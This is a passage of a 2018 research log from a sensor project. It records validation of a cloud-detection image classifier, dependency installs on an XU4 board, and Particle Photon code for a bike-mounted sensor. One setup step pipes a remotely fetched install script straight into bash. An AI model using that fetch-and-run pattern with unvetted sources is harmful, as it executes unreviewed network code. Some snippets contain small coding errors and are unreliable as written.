-- True classifications of the Training images are saved as ```All_Targets_Training ```
-- True classifications of the Testing images are saved as ```All_Targets_Testing```
- Using the loaded Random Forest Classifier and the Feature Vectors specified, predictions are made using the following scripts. Separate studies were done for the Training and Testing data sets.
```
Predictions_Pre_Training = loaded_Random_Tree.predict(All_Features_Training)
Predictions_Training = np.transpose(np.matrix(np.array(Predictions_Pre_Training)))
Predictions_Pre_Testing = loaded_Random_Tree.predict(All_Features_Testing)
Predictions_Testing = np.transpose(np.matrix(np.array(Predictions_Pre_Testing)))
```
- Since the predictions needed to be binary for verication, they were modified accordingly.
```
Predictions_Training[Predictions_Training < 0.5] = 0
Predictions_Training[Predictions_Training >= 0.5] = 1
Predictions_Testing[Predictions_Testing < 0.5] = 0
Predictions_Testing[Predictions_Testing >= 0.5] = 1
```
The Accuracies for the Training and Testing data are recorded using the folling scripts.
```
Correct_Predictions_Training = sum(Predictions_Training == All_Targets_Training)
print("Training Accuracy Sklearn:", Correct_Predictions_Training/len(All_Targets_Training))
Correct_Predictions_Testing = sum(Predictions_Testing == All_Targets_Testing)
print("Testing Accuracy Sklearn:", Correct_Predictions_Testing / len(All_Targets_Testing))
```
#### 7.3 Figuring out the most importaint features
The Random Forest Classifier is capable of giving a rank to each Feature with respective to there imporatance in the classification. The following script is used to obtain the importance rank of each feature.
```
Importances = list(loaded_Random_Tree.feature_importances_)
Features_Description = ["Red", "Green", "Blue", \
"H", "S", "V", \
"L", "A", "B", \
"Red/Blue", "Red-Blue", \
"(Blue-Red)/(Blue+Red)", \
"Chroma"]
Features_Description_Array = np.array(Features_Description)
Features_Description_List = list(Features_Description)
# List of tuples with variable and importance
Feature_Importances = [(feature, round(importance, 2)) for feature, importance in
zip(Features_Description_List, Importances)]
Feature_Importances = sorted(Feature_Importances, key=lambda x: x[1], reverse=True)
```
The follwing Graph depicts the Importance each feature.

**These results may be useful, if lessor number of features are to be used due to resasource constraints**
#### 7.4 Comparison to the Caffe Classifier
A separate classification is done using the Caffe Classifier. Further details on the Caffe Classification can be found [here](https://github.com/waggle-sensor/plugin_manager/tree/master/plugins/openCV). Using the images gained from the Caffe classification, a separate verification is done using the SWIMSEG data set. The verification is done using the same means discussed for the Sklearn (Random Forest) classifier.
The Following table compares the predictions made through either classifier.
| Accuracy Estimations | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) | 80% | 84% |
| Sklearn (Random Forest) | 90% | 85% |
| [Confusion Matrices] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
| [Confusion Matrices Normalized] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
#### 7.5 Writing the final Module
The post processing via the resulting image of the Sklearn Classifier is done through this model. The eventual results that are to be obtained are as follows.
- Cloud Percentage of the sky
- For the Sky pixels,
- Average pixel value in Blue
- Average pixel value in Green
- Average pixel value in Red
- For the Cloud pixels,
- Average pixel value in Blue
- Average pixel value in Green
- Average pixel value in Red
A description of how these were calculated are given below:
- Initially the image to be studied is loaded via a system Argument.
```
path_src = sys.argv[1]
Original_Image = cv2.imread(path_src)
```
- From the premade Sklearn module, the prediction is made isitailly done. The module is loaded via pickle. Afterward , the usual preprocessing of the prediction is done.
```
print("Loading the Random Forest Model")
Model_Save_File_Name = 'Cloud_App_Via_Sklearn_Model_Reduced.sav'
loaded_Random_Tree = pickle.load(open(Model_Save_File_Name, 'rb'))
print("Done Loading")
# Gaining The Prediction
print("Gaining the Prediction...")
Prediction = loaded_Random_Tree.predict(Features)
Prediction = np.transpose(np.matrix(np.array(Prediction)))
Prediction[Prediction < 0.5] = 0
Prediction[Prediction >= 0.5] = 1
```
- At this point a the cloud percentate of the sky is gained via ```Cloud_Percentage = sum(Prediction)/len(Prediction)```
- A separate mask of similar size of the original image is made. The said mask will have 1's for cloud pixels and 0's for sky pixels. Then its mulitplied by the orginal image via ``` Only_Clouds = cv2.multiply(Original_Image_float, Cloud_Pixels_Normalized) ``` . The resulting image is used to gain the average pixel values of clouds.
The follwing scripts illustrates the process,
```
# Summing up the pixel values for each Pallaette
Color_Sum_Blue_Sky = Only_Sky[:,:,0].sum()
Color_Sum_Green_Sky = Only_Sky[:,:,1].sum()
Color_Sum_Red_Sky = Only_Sky[:,:,2].sum()
Cloud_Pixel_Count = np.sum(Binary_Image[:,:,0] == 255
Average_Pixel_Value_Blue_Sky = Color_Sum_Blue_Sky/Sky_Pixel_Clount
Average_Pixel_Value_Green_Sky = Color_Sum_Green_Sky/Sky_Pixel_Clount
Average_Pixel_Value_Red_Sky = Color_Sum_Red_Sky/Sky_Pixel_Clount
```
- Similar Measures were taken to gain the Average Pixels values of the sky.
- An example of an imlpimentation of the module is given below,
```
python CloudApp_Final_Module_Reduced.py 0001.png
Loading the Random Forest Model
Done Loading
Gaining the Prediction...
Writing Resulting Images ...
Percentage of Clouds: 0.7765027777777778 %
Average Pixel Value in Blue for the Sky: 139.52020283622716
Average Pixel Value in Green for the Sky: 108.23629426167365
Average Pixel Value in Red for the Sky: 86.56886115909967
Average Pixel Value in Blue for the Clouds: 154.18068190354904
Average Pixel Value in Green for the Clouds: 130.44013579403378
Average Pixel Value in Red for the Clouds: 114.31494127873907
```
## 25th of June 2018
Continuing on the Cloud Detection Verification
### Task 8 : Writing a modified version of the Cloud/Sky Classifier
The training set contained 1013 images, each having 600* 600 pixels. As such the feature data set contained 600 * 600 * 1013 rows and 14 columns. To have a managable data set for training the number of features used were reduced using the study done for the most importaint features on [task 7.3](#user-content-73-figuring-out-the-most-importaint-features). For the final training feature set only 6 features were used. They are listed below,
- Blue Pixel Value
- Blue Pixel Value(From LAB)
- Red Pixel Value/Blue Pixel Value
- Red Pixel Value - Blue Pixel Value
- Blue Pixel Value-Red Pixel Value)/(Blue Pixel Value+Red Pixel Value),
- Chroma Value - (Max(RGB)-Min(RGB))
No further modification to the initial study was made.
- Updated Results for the complete data set are as follows:
| Accuracy Estimations | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) | 79% | 80% |
| Sklearn (Random Forest) | 89% | 89% |
| [Confusion Matrices] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
| [Confusion Matrices Normalized] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) |  |  |
| Sklearn (Random Forest) | |  |
For the updated feature set, the Importance of each feature is also obtained for completeness. They are given on the following graph:

Following are some sample images
## 26th-29th of June 2018
Thefolloing tasks are geared towards Importing the Classifier to an XU4
### Task 9 : Installing dependancies on the XU4
#### 9.1 Intalling pip
```
sudo apt-get install python3-pip
```
#### 9.2 Installing numpy and scipy
```
sudo apt-get install python3-numpy
sudo apt-get install python3-scipy
```
#### 9.3 Installing sklearn
```
sudo apt-get install scikit-learn
```
#### 9.4 Installing skimage
```
sudo apt-get install python3-skimage
```
#### 9.5 Installing open CV
- Unfortunately open CV had to be installed from ground up(Probably because of the use of the reduced image).
This [link](http://www.python36.com/how-to-install-opencv340-on-ubuntu1604/) was used as a reference here.
```
sudo apt-get install build-essential
sudo apt-get install cmake git libgtk2.0-dev pkg-config libavcodec-dev libavformat-dev libswscale-dev
sudo apt-get install python-dev python-numpy libtbb2 libtbb-dev libjpeg-dev libpng-dev libtiff-dev libjasper-dev libdc1394-22-dev
sudo apt-get install libavcodec-dev libavformat-dev libswscale-dev libv4l-dev
sudo apt-get install libxvidcore-dev libx264-dev
sudo apt-get install libgtk-3-dev
sudo apt-get install libatlas-base-dev gfortran pylint
```
- On the follwoing command make sure to match the python installations within the XU4
```
sudo apt-get install python2.7-dev python3.5-dev
```
For the current install of the Ubuntu image python 2.7 and python 3.5 was embedded within.
- Download OpenCV 3.4.0
```
wget https://github.com/opencv/opencv/archive/3.4.0.zip -O opencv-3.4.0.zip
wget https://github.com/opencv/opencv_contrib/archive/3.4.0.zip -O opencv_contrib-3.4.0.zip
```
- Install Unzip
```
sudo apt-get install unzip
```
- Extracting the files
```
unzip opencv-3.4.0.zip
unzip opencv_contrib-3.4.0.zip
```
- Creating the build directory inside OpenCV-3.4.0:
```
cd opencv-3.4.0
mkdir build
cd build
```
- Configuring cmake:
```
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local -DOPENCV_EXTRA_MODULES_PATH=../../opencv_contrib-3.4.0/modules -DOPENCV_ENABLE_NONFREE=True ..
```
- Finally doing the install
```
make -j8
```
Here 8 is the number of cores present(Since XU4 has 8 cores).
Concluding the installation
```
sudo make install
```
- Reinitialize static libs
```
sudo ldconfig
```
#### 9.6 Exporting the classifier into the XU4
- Creating a directory for the classifier to stored
On the home directory , type in the follwoing commands
```
mkdir waggle
cd waggle
mkdir RT_Claassifier
```
- The next step is done on the host machine where the cloudApp Final module is saved. On the directory where the cloudapp is save type in and execute the follwing command
```
scp CloudApp_Final_Module_for_NB.py root@10.10.10.136:/home/waggle/RT_Classifier
```
- Exporting a sample image
```
scp 0003.png root@10.10.10.136:/home/waggle/RT_Classifier
```
For the last two steps approprate ip addess for the XU4 must be used. On this instance, the ip address of the XU4 is 10.10.10.136. **Make sure to have the XU4 connected to the same network as the PC**
### Task 10: Testing the Classifier on the XU4
On the XU4 command window type in
```
python3 CloudApp_Final_Module_for_NB.py 0003.png
```
Unfortunately this yeilded an error message which ended with
```
Traceback (most recent call last):
File "CloudApp_Final_Module_for_Pkl.py", line 154, in <module>
loaded_Random_Tree = joblib.load(Model_Save_File_Name)
File "/usr/local/lib/python3.5/dist-packages/sklearn/externals/joblib/numpy_pickle.py", line 578, in load
obj = _unpickle(fobj, filename, mmap_mode)
File "/usr/local/lib/python3.5/dist-packages/sklearn/externals/joblib/numpy_pickle.py", line 508, in _unpickle
obj = unpickler.load()
File "/usr/lib/python3.5/pickle.py", line 1039, in load
dispatch[key[0]](self)
File "/usr/lib/python3.5/pickle.py", line 1394, in load_reduce
stack[-1] = func(*args)
File "sklearn/tree/_tree.pyx", line 601, in sklearn.tree._tree.Tree.__cinit__
ValueError: Buffer dtype mismatch, expected 'SIZE_t' but got 'long long'
```
A bit of research into the problem revealed that the classifier had to be trained on a machine matching the internal architecture of the XU4 (32-bit). Unfortunately, this complication could not be resolved.
### Task 11 : Trying out other Classifiers.
Using the same means as the Random Forest Classifier, a Naive baised Classification was done. The Naive baised classification was implimented within the XU4 with the use of the preceeding steps speicified. The follwing represent the validation study done for the said Classifier.
| [Confusion Matrices] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Sklearan (Naive Baiysed) |  |  |
| [Confusion Matrices Normalized] | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Sklearan (Naive Baiysed) |  |  |
The updated accuracies for all 3 classifiers studied.
| Accuracy Estimations | Training | Testing |
|:----------------------------:|:--------:|:-------:|
| Caffe (Superpixel Algorythm) | 80% | 84% |
| Sklearn (Random Forest) | 90% | 89% |
| Sklearn(Naive Baised) | 87% | 88% |
## July 2 - July 10th
Getting back on track with the bike waggle project.
### Task 11 Starting off with the Bike Bottle Design
#### Task 11.1 : Deciding on the Sensor Brain
The initial decision was made to use the https://www.particle.io/ platform for the sensor brain. They provide two options.
- Particle Photon : Works with Wi - Fi (https://docs.particle.io/datasheets/photon-(wifi)/photon-datasheet/)
- Particle Electron : Works on Cellular Data (https://docs.particle.io/datasheets/electron-(cellular)/electron-datasheet/)
Finalized on taking on the Photon, since we won't have to pay for cellular.
A modification of the code done by the high school students for the Photon can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-1.ino)
#### Task 11.2: Deciding on the Sensors to Use
The information on the decided sensors can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/Technical_Specs.md).
#### Task 11.3: Writing the base code
The iterations on the codes done can be found [here](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/sensorgram).
## July 11
Getting back on the Cloud Detection App
### Task 12 : Cloud App Conclusion
#### Task 12.1: Installing a Waggle image on the XU4
The Waggle Image was downloaded to the local PC with the help of Chris.
The rest of the steps were done using the guide provided [here](https://github.com/waggle-sensor/summer2018/tree/master/chen/waggle_image#burning-image-to-microsd)
#### Task 12.2: Pushing the CloudyApp into the XU4
Make sure to have an ethernet adapter in this case. The usual ethernet connection won't work since the waggle image is programmed only to listen to Beehive.
Using an ethernet adapter you may scp the sample image, the module file and the python script file onto the XU4.
```
scp Cloud_App_Final_Module_for_NB.py root@10.10.10.101:/home/waggle/Cloud_Detection_App
scp 0937.png root@10.10.10.101:/home/waggle/Cloud_Detection_App
```
#### Task 12.3: Installing Dependencies
##### Task 12.3.1 Installing numpy and scipy
```
sudo apt-get install python3-numpy
sudo apt-get install python3-scipy
```
##### Task 12.3.2 Installing sklearn
```
sudo apt-get install scikit-learn
```
##### Task 12.3.4 Installing skimage
```
sudo apt-get install python3-skimage
```
#### Task 12.4: Testing the program on the XU4
The cloudy app program based on the Naive Bayes Classifier was successfully tested out on the waggle image. The next step is to test out the program within the Waggle Image pipeline on the Edge Processor.
## July 12
Testing the Cloud Detection App within the Waggle image Pipeline
#### Task 12.5: Research on the Waggle Image Pipeline
The following set of links were examined to gain an idea of the inner workings of the Waggle Image Pipeline.
- [Pipeline architecture](https://github.com/waggle-sensor/edge_processor/tree/master/image)
- [Image Detector Plugin](https://github.com/waggle-sensor/plugin_manager/tree/master/plugins/image_detector)
#### Task 12.6: Embedding Cloudy App Code within the Current Image Exporter Tool
The Image pipeline works on 3 main components,
- [Image Producer](https://github.com/waggle-sensor/edge_processor/tree/master/image/producer)
- [Image Pipeline](https://github.com/waggle-sensor/edge_processor/tree/master/image/pipeline)
- [Image Exporter](https://github.com/waggle-sensor/edge_processor/tree/master/image/exporter)
The image exporter was to be the viable candidate for the Cloud App to be plugged in, as at this stage the image data was actually converted into an image. Using the code done for the [image exporter](https://github.com/waggle-sensor/edge_processor/blob/master/image/exporter/image_exporter.py), a test code was written.
The test code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/cloud_detection/Sklearn/Naive_Baised_Classifier/Sklearn_Image_Maker_for_SWMSEG_NB.py).
## July 13 - 15
Continuing on the Bike Waggle Project
### Task 13 - Writing Quotation for the Bike Waggle Project
A quotation was made to get a shipment of the devices needed for the bike Waggle Sensor. The said quotation can be found [here](https://docs.google.com/spreadsheets/d/13GMrc0lDrT8yg4jRUNnsqN4OhRasOGfK-BKTgsxrhDE/edit#gid=0)
- A detailed list of the devices to be used can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/Technical_Specs.md)
### Task 14 - Modifying the Sensorgram Code for the Bike Waggle Sensor
Iteration 3 of the bike waggle code was completed. The summary of the said iteration is given below. These descriptions can also be found within the [bike waggle](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle) project folder.
###### Version Date : 07/15/2018
Additions: On this iteration the case where there is no connectivity is considered. On Iteration 2 each sensorgram was published individually. The current iteration works on publishing multiple sensorgrams instantaneously(Through individual
publish statements).
**NOTE: It was uncovered that for each event around 9 sensorgrams [255 characters] can be published. As such live data only takes 5 seconds
to publish (since we only have 42 sensor inputs).**
On iteration 4, the mechanism in which the sampling time is read may be modified. Whether the packing time differs from the time at which the data is read will be investigated. This may have to wait till the physical device is made.
**The Source Code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-3.ino)**
## July 16 - 19
### Task 15: Setting up a SD card logger for the Bike Waggle Project.
#### Task 15.1 - Research on the "SdCardLogHandlerRK" Library
The library worked quite well at first glance. The initial code had the capabilities of creating and making logs for the data inputs given. However, the said library is meant to be used for debugging the Photon. As such the programmed photon logged a lot of unnecessary data such as information on Wi-Fi connectivity and error messages. The code also utilized the SdFat library used in photon devices.
The sample code used is given below.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdCardLogHandlerRK.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
#include "Particle.h"
#include "SdFat.h"
#include "SdCardLogHandlerRK.h"
SYSTEM_THREAD(ENABLED);
const int SD_CHIP_SELECT = D5;
SdFat sd(1);
SdCardLogHandler logHandler(sd, SD_CHIP_SELECT, SPI_FULL_SPEED,LOG_LEVEL_INFO);
//STARTUP(logHandler.withNoSerialLogging());// Dont have serial loging
STARTUP(logHandler.withDesiredFileSize(50000).withMaxFilesToKeep(5).withLogsDirName("Bike_Waggle_Logs_LAKITHA_3").withNoSerialLogging());
Logger LogToSD("app.sd");
size_t counter = 0;
void setup() {
Serial.begin(9600);
}
void loop() {
Log.info("testing counter=%d", counter++);
LogToSD.info("write to SD counter=%d", counter);
delay(100000);
}
```
The Git repository for the said library can be found [here](https://github.com/rickkas7/SdCardLogHandlerRK)
The pins used under the SPI(1) interface is defined below.
| Photon | SPI Name | SD Reader |
| ------ | -------- | --------- |
| D5 | SS | CS |
| D4 | SCK | SCK |
| D3 | MISO | DO |
| D2 | MOSI | DI |
| 3V3 | | VCC |
| GND | | GND |
| | | CD |
Due to the lack of control over which messages to log, a more primitive SD card logging library was looked up.
#### Task 15.2 - Research on the "SdFat" Library
The SdFat library turned out to be extremely stable and it provided the control that the user lacked with the previous libraries.
The sample code initially used is found below.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
#include "SdFat.h"
// Pick an SPI configuration.
// See SPI configuration section below (comments are for photon).
#define SPI_CONFIGURATION 0
//------------------------------------------------------------------------------
// Setup SPI configuration.
#if SPI_CONFIGURATION == 0
// Primary SPI with DMA
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFat sd;
const uint8_t chipSelect = A2;
#elif SPI_CONFIGURATION == 1
// Secondary SPI with DMA
// SCK => D4, MISO => D3, MOSI => D2, SS => D1
SdFat sd(1);
const uint8_t chipSelect = D1;
#elif SPI_CONFIGURATION == 2
// Primary SPI with Arduino SPI library style byte I/O.
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFatLibSpi sd;
const uint8_t chipSelect = SS;
#elif SPI_CONFIGURATION == 3
// Software SPI. Use any digital pins.
// MISO => D5, MOSI => D6, SCK => D7, SS => D0
SdFatSoftSpi<D5, D6, D7> sd;
const uint8_t chipSelect = D0;
#endif // SPI_CONFIGURATION
//------------------------------------------------------------------------------
File myFile;
int lk=1;
void setup() {
Serial.begin(9600);
// Wait for USB Serial
while (!Serial) {
SysCall::yield();
}
Serial.println("Type any character to start");
while (Serial.read() <= 0) {
SysCall::yield();
}
// Initialize SdFat or print a detailed error message and halt
// Use half speed like the native library.
// Change to SPI_FULL_SPEED for more performance.
if (!sd.begin(chipSelect, SPI_HALF_SPEED)) {
sd.initErrorHalt();
}
}
void loop() {
// open the file for write at end like the "Native SD library"
if (!myFile.open("test.txt", O_RDWR | O_CREAT | O_AT_END)) {
sd.errorHalt("opening test.txt for write failed");
}
// if the file opened okay, write to it:
Serial.print("Printing Line:");
myFile.println(String(lk));
// close the file:
lk=lk+1;
myFile.close();
Serial.println(String(lk));
delay(1000);
// close the file:
//myFile.close();
}
```
The Git repository for the said library can be found [here](https://github.com/greiman/SdFat-Particle)
Due to the success of the testing phase for the said library, the eventual code was plugged into the main program for the Bike Waggle Project.
### Task 16 - Setting up the SD card Logger for the Bike Waggle Project
Iteration 4 of the bike waggle code was completed. The summary of the said iteration is given below. These descriptions can also be found within the [bike waggle](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle) project folder.
#### Version Date : 07/19/2018
Additions: This iteration looks at how the SD card can save data logs. A few libraries were tried out. The SdFat library appeared to be the most useful and the most reliable. The code is designed to print sensor information and headers each time the device is powered on. On each loop the sensor outputs will be printed out on a new line. These logs will be printed out in a text file named Lakithas_Photon.txt within a folder named Lakithas_Photon. The names of the directory and the text file will be uniquely identified for each bike waggle. If the said directory and the said text file do not exist, the photon is formulated to create the said folder and the said file when the device is initially turned on.
The credentials for the MPU9250 sensor was also added.
A Sample of the SD card log can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/SD_Card_Log.txt).
On iteration 5, The means in which the LCD Display is set up will be looked into.
The pins used under the SPI(1) interface is defined below.
| Photon | SPI Name | SD Reader |
| ------ | -------- | --------- |
| A2 | SS | CS |
| A3 | SCK | SCK |
| A4 | MISO | DO |
| A5 | MOSI | DI |
| 3V3 | | 3V |
| GND | | GND |
| | | CD |
**The Source Code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-4.ino)**
## July 20
### Task 17: Setting up the LCD Display for the Bike Waggle Project.
#### Task 17.1 - Research on the "LiquidCrystal_I2C_Spark" Library
The initial tests done on the said library turned out to be fruitful. The initial test code can be found below.
```
// This #include statement was automatically added by the Particle IDE.
#include <LiquidCrystal_I2C_Spark.h>
LiquidCrystal_I2C *lcd;
void startupLCD(){
lcd->setCursor(5 /*columns*/,1 /*rows*/);
lcd->print("BIKE");
delay(1000) ;
lcd->setCursor(8 /*columns*/,2 /*rows*/);
lcd->print("WAGGLE");
delay(1000) ;
lcd->clear();
// Give Device Data
lcd->setCursor(0 /*columns*/,0 /*rows*/);
lcd->print("Project Bike Waggle");
lcd->setCursor(0 /*columns*/,1 /*rows*/);
lcd->print("Version 1.0");
lcd->setCursor(0 /*columns*/,2 /*rows*/);
lcd->print("LAKITHAs Photon");
delay(1000) ;
lcd->clear();
for (int count=0;count<=19;count++)
{ lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3/*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=19;count>=0;count--)
{ lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3/*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=0;count<=19;count++)
{ lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3 /*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=19;count>=0;count--)
{
lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3 /*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
lcd->setCursor(5 /*columns*/,1 /*rows*/);
lcd->print("BIKE");
delay(1000) ;
lcd->setCursor(8 /*columns*/,2 /*rows*/);
lcd->print("WAGGLE");
delay(1000) ;
lcd->clear();
}
void OperationalLCD(){
lcd->clear();
lcd->setCursor(0 /*columns*/,0 /*rows*/);
lcd->print("Bike Waggle|"+ Time.format(Time.now(),"%H:%M:%S"));
lcd->setCursor(0 /*columns*/,1 /*rows*/);
lcd->print("PM1:2.342");
lcd->setCursor(0 /*columns*/,2 /*rows*/);
lcd->print("PM2.5:4.33");
lcd->setCursor(0 /*columns*/,3 /*rows*/);
lcd->print("PM10:10.340");
lcd->setCursor(11 /*columns*/,0 /*rows*/);
lcd->print("|");
lcd->setCursor(11 /*columns*/,1 /*rows*/);
lcd->print("|");
lcd->setCursor(11 /*columns*/,2 /*rows*/);
lcd->print("|");
lcd->setCursor(11 /*columns*/,3 /*rows*/);
lcd->print("|");
lcd->setCursor(12 /*columns*/,1 /*rows*/);
lcd->print("TM:29.42");
lcd->setCursor(12 /*columns*/,2 /*rows*/);
lcd->print("HM:50.33");
delay(1000);
}
void setup()
{
Serial.begin(9600);
// The address is typically 0x27. I2C Address: 0x3F
// https://www.sainsmart.com/new-sainsmart-iic-i2c-twi-1602-serial-lcd-module-display-for-arduino-uno-mega-r3.html
lcd = new LiquidCrystal_I2C(0x3F /*address*/, 20/*columns*/, 4/*rows*/);
lcd->init();
lcd->backlight();
lcd->clear();
startupLCD();
}
void loop()
{
OperationalLCD();
}
```
The Git repository for the said library can be found [here](https://github.com/BulldogLowell/LiquidCrystal_I2C_Spark)
Due to the success of the testing phase for the said library, the eventual code was plugged into the main program for the Bike Waggle Project.
#### Task 17.2 - Plugging in the LCD Display code for the Bike Waggle Project
Iteration 5 of the bike waggle code was completed. The summary of the said iteration is given below. These descriptions can also be found within the [bike waggle](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle) project folder.
#### Version Date : 07/20/2018
Additions: On this iteration the LCD display is set up. The LiquidCrystal_I2C_Spark library was utilized here. The photon was programmed to display a startup message as well as live coverage of the sensor outputs with a refresh interval matching the loop interval.
On iteration 6,The GPS and the RTC will be hooked up to the photon.
The pins used under the I2C interface is defined below.
| Photon | LCD |
| ------ | --------- |
| DO | SDA |
| D1 | SCL |
| VIN | VCC |
| GND | GND |
On this [link](https://docs.particle.io/reference/firmware/photon/#wire-i2c-) Particle.io advises to use pull-up resistors when using the I2C interface. As such **two pull-up resistors were connected between D0 and 3V3 and between D1 and 3V3 respectively.**
Some helpful links are posted below.
- [Link 1](https://www.hackster.io/ingo-lohs/what-s-my-i2c-address-0a097e)
- [Link 2](https://community.particle.io/t/resolved-i2c-lcd-on-photon-core-struggle/23981)
**The Source Code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-5.ino)**
## July 23 -24
### Task 18 - Setting Up the Serial Port for Debugging the Particle Photon
The Serial Connectivity can be set up in one of 3 ways for the Photon.
- Through the particle CLI
- Using Screen
- Through the Arduino IDE
#### 18.1 Through the Particle CLI
- Installing Particle CLI
On the Linux command line type in ``` bash <( curl -sL https://particle.io/install-cli )```
- Reading Serial Commands
Once Particle CLI is installed, on the command line type ``` particle serial monitor```
#### 18.2 Using Screen
- Installing Screen
On the Linux command line type in ``` sudo apt-get install screen```
- Figuring out the USB Port
On the command line type ```ls /dev/ttyACM*```. Once the command is run, a list of USB inputs will display. Usually you will be presented with something like ```/dev/ttyACM0```.
- Open Screen
Copy the device ID from the previous task and type in ```sudo screen [device ID]```
Your command should look like ```sudo screen /dev/ttyACM0```. You may need to type in the super user credentials.
The following [link](https://community.particle.io/t/serial-tutorial/26946) will give a description of other means of Serial Communication for the Particle Photon.
### Task 19: Managing the WI-FI Connectivity on the Photon
Working on the Particle Photon, it was found out that the Photon didn't initiate itself when there was no connectivity. Due to the remote environments the Photon was to be used in, this can cause a serious problem. As such the different modes of Photon cloud connectivity were looked up.
The Photon provided 3 system modes
- AUTOMATIC : By default the Photon will be in Automatic Mode, and the device will not start its base code without a connection to the cloud (without Wi-Fi)
- SEMI_AUTOMATIC: Will not need a Wi-Fi connection unless the user initiates the Wi-Fi connection. However it retains most features from the Automatic Mode.
- MANUAL : The User has all control over most essential functions of the photon. Often risky since some essential features will not be ran unless called upon by the user.
A precise description of each mode can be found [here](https://docs.particle.io/reference/firmware/photon/#system-modes).
For the purpose of the Bike Waggle Project the SEMI_AUTOMATIC mode was implemented. In order to implement the said mode the following code is considered to be patched within the main code.
```
SYSTEM_MODE(SEMI_AUTOMATIC)
SYSTEM_THREAD(ENABLED)
const uint32_t msRetryDelay = 2*60000; // retry every 5min
const uint32_t msRetryTime = 30000; // stop trying after 30sec
bool retryRunning = false;
Timer retryTimer(msRetryDelay, retryConnect); // timer to retry connecting
Timer stopTimer(msRetryTime, stopConnect); // timer to stop a long running try
void retryConnect()
{
if (!Particle.connected()) // if not connected to cloud
{
Serial.println("reconnect");
stopTimer.start(); // set of the timout time
WiFi.on();
Particle.connect(); // start a reconnectino attempt
}
else // if already connected
{
Serial.println("connected");
retryTimer.stop(); // no further attempts required
retryRunning = false;
}
}
void stopConnect()
{
Serial.println("stopped");
if (!Particle.connected()) // if after retryTime no connection
WiFi.off(); // stop trying and swith off WiFi
stopTimer.stop();
}
void setup()
{
Serial.begin(115200);
// pinMode(D7, OUTPUT);
Particle.connect();
if (!waitFor(Particle.connected, msRetryTime))
WiFi.off(); // no luck, no need for WiFi
}
void loop()
{
// MAIN LOOP CODE
//digitalWrite(D7, !digitalRead(D7));
time_t time = Time.now();
Serial.println(Time.format(time, TIME_FORMAT_DEFAULT));
delay(10000);
// Recheck Wifi Functions
if (!retryRunning && !Particle.connected())
{ // if we have not already scheduled a retry and are not connected
Serial.println("schedule");
stopTimer.start(); // set timeout for auto-retry by system
retryRunning = true;
retryTimer.start(); // schedula a retry
}
delay(500);
}
```
The Wi-Fi connectivity is managed by two timers set on two function calls. The *retryConnect* function initiates the Wi-Fi connectivity. The *retryTimer* calls up this function every 5 minutes when no Wi-Fi connectivity is found. Every time the *retryConnect* function is called up it will check for Wi-Fi for 30 seconds before initiation of the code in queue. This is controlled by the *stopTimer* via the call-up function *stopConnect*.
The said times of each function implementation are under the user's control. On the final version of the bike waggle the retry timer will probably be set to 30 minutes or 1 hour.
This [link](https://community.particle.io/t/solved-make-photon-run-code-without-being-necessarily-connected-to-the-particle-cloud/25953) will emphasize on the inner workings of the code.
## July 25
### Task 20 - Setting Up the Real Time Clock
The following tasks are aimed towards building an on-board RTC.
#### 20.1 Looking up the *RTClibrary* in Particle Photon
